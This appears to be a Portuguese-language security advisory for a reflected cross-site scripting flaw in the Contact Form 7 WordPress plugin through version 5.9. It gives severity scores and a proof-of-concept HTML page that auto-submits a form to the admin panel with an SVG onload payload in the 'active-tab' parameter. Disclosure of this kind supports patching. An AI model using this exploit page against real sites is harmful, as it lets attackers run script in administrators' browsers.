
Contact Form 7 <= 5.9 - Cross-Site Scripting Refletido
Contact Form 7 <= 5.9 - Cross-Site Scripting Refletido
O plugin Contact Form 7 para WordPress é vulnerável a Cross-Site Scripting Refletido através do parâmetro ‘active-tab’ em todas as versões até, e incluindo, 5.9 devido a sanitização de entrada e escape de saída insuficientes. Isso torna possível que atacantes não autenticados injetem scripts web arbitrários em páginas que são executados se eles conseguirem enganar um usuário para realizar uma ação, como clicar em um link.
CVSS: 6.1
Impact: 2.7
Vector: network
User Interaction: required
Privileges Required: none
Published: 2024-03-13
Updated: 2024-03-13
Você precisa saber o valor do ID do post em que o formulário está; caso contrário, quando o administrador clicar no link, não funcionará. No geral, isso deveria ter privilégios exigidos como H, pois você precisa que o administrador clique no link.
<html>
<body>
<form action="http://kubernetes.docker.internal/wp-admin/admin.php">
<input type="hidden" name="page" value="wpcf7" />
<input type="hidden" name="post" value="4478" />
<input type="hidden" name="active-tab" value="'"><svg/onload=prompt(7);>{{7*7}}" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>